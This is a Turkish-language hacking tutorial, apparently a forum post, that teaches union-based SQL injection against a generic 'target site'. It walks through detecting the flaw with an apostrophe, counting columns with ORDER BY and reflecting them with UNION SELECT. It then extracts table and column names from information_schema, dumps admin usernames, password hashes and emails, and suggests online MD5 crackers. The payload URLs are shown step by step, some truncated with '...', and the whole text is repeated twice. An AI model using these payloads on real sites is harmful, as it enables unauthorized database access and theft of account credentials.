Öncelikle hedef sitemizde sql açığı denemek için id verilmiş bir sayfa bulalım ardından 'a komutu vererek açık olup olmadıgını bulalım.
hedefsite.com/php?id=1
sayfasına 'akomutu verdiğimizde eğerki ekranda bir değişiklik veya bir hata göstergesi oluyor ise sistemimizde %99 sql acığı mevcut devam edelim.
hedef sitemizde kolon sayısını bulacağız bunun için ordey+by+ veya group+by+ komutunu kullanacağız
Kod:
http://www.hedefsite.com/php?.id=1+order+by+100
bu yüz sayısını misal veriyorum.
Bu sayıyı gittikçe azaltıp devam edicez.Mesela
Kod:
http://www.hedefsite.com/php?.id=1+order+by+5
de hata değişiyor ise kolon sayımız 5'tir.
Kolon sayımızı ögrendiğimize göre şimdi kolonları ekrana yansıtabiliriz.
Bunun için union+select+... kodumuzu kullanacağız.
Kod:
http://www.hedefsite.com/php?.id=1+union...,1,2,3,4,5
yazıyoruz.Kolon sayımız 5 olduğu için 5e kadar yazıcagız.Sizin kolon sayınız başka olabilir .
Böyle kolonlarımızı ekrana yansıttık. Bazen bu komut ile kolonlar ekrana yansımıyor .
Eger bu komut ile kolonlar ekrana yansımaz ise URLmizin sonuna -- ifadesini ekleriz.
Evet diyelimki 2 ve 4 kolonları cıktı ekrana.
Bu Sayılardan tablo nasıl çekilir ?
Kod:
http://www.hedefsite.com/php?.id=1+union...ema.tables
yaparak
tablo isimlerini çekeriz. Ama hepsini çekmez . Hepsini çekmek için.
Kod:
http://www.hedefsite.com/php?.id=1+union...03;.tables
tablo isimleri yansıdı . Kücük harflerle yazılan isimler bize lazım olan tablolar.
Tabloların içinde örneğin users admins gibi tablo isimleri gördük . Bu isimleri kolonları bulmak için kullanıcaz.
Örnegin usersden yola çıkalım.
Kod:
http://www.hedefsite.com/php?.id=1+union...table_name="users"
Şimdi kolonlar ekrana yansımış olur . örneğin user_id , user_name , user_password , user_email olsun.
Şimdi bu kolonları kullanıp admin şifrelerini bulucaz.
Kod:
http://www.hedefsite.com/php?.id=1+union...03;om+user
Evet ekrana admin kullanıcı adı - şifresi - üyelik no su - ve emaili yansıdı .
Yansıyan şifre büyük bir ihtimalle md5 olarak yansımıştır.
Bu md5'i kırmamız gerekiyor .
MD5 Decrypter - MD5 Decryption, Free MD5 Decryptor, Online MD5 Cracker, MD5 Security
hedefsite.com/php?id=1
sayfasına 'akomutu verdiğimizde eğerki ekranda bir değişiklik veya bir hata göstergesi oluyor ise sistemimizde %99 sql acığı mevcut devam edelim.
hedef sitemizde kolon sayısını bulacağız bunun için ordey+by+ veya group+by+ komutunu kullanacağız
Kod:
http://www.hedefsite.com/php?.id=1+order+by+100
bu yüz sayısını misal veriyorum.
Bu sayıyı gittikçe azaltıp devam edicez.Mesela
Kod:
http://www.hedefsite.com/php?.id=1+order+by+5
de hata değişiyor ise kolon sayımız 5'tir.
Kolon sayımızı ögrendiğimize göre şimdi kolonları ekrana yansıtabiliriz.
Bunun için union+select+... kodumuzu kullanacağız.
Kod:
http://www.hedefsite.com/php?.id=1+union...,1,2,3,4,5
yazıyoruz.Kolon sayımız 5 olduğu için 5e kadar yazıcagız.Sizin kolon sayınız başka olabilir .
Böyle kolonlarımızı ekrana yansıttık. Bazen bu komut ile kolonlar ekrana yansımıyor .
Eger bu komut ile kolonlar ekrana yansımaz ise URLmizin sonuna -- ifadesini ekleriz.
Evet diyelimki 2 ve 4 kolonları cıktı ekrana.
Bu Sayılardan tablo nasıl çekilir ?
Kod:
http://www.hedefsite.com/php?.id=1+union...ema.tables
yaparak
tablo isimlerini çekeriz. Ama hepsini çekmez . Hepsini çekmek için.
Kod:
http://www.hedefsite.com/php?.id=1+union...03;.tables
tablo isimleri yansıdı . Kücük harflerle yazılan isimler bize lazım olan tablolar.
Tabloların içinde örneğin users admins gibi tablo isimleri gördük . Bu isimleri kolonları bulmak için kullanıcaz.
Örnegin usersden yola çıkalım.
Kod:
http://www.hedefsite.com/php?.id=1+union...table_name="users"
Şimdi kolonlar ekrana yansımış olur . örneğin user_id , user_name , user_password , user_email olsun.
Şimdi bu kolonları kullanıp admin şifrelerini bulucaz.
Kod:
http://www.hedefsite.com/php?.id=1+union...03;om+user
Evet ekrana admin kullanıcı adı - şifresi - üyelik no su - ve emaili yansıdı .
Yansıyan şifre büyük bir ihtimalle md5 olarak yansımıştır.
Bu md5'i kırmamız gerekiyor .
MD5 Decrypter - MD5 Decryption, Free MD5 Decryptor, Online MD5 Cracker, MD5 Security
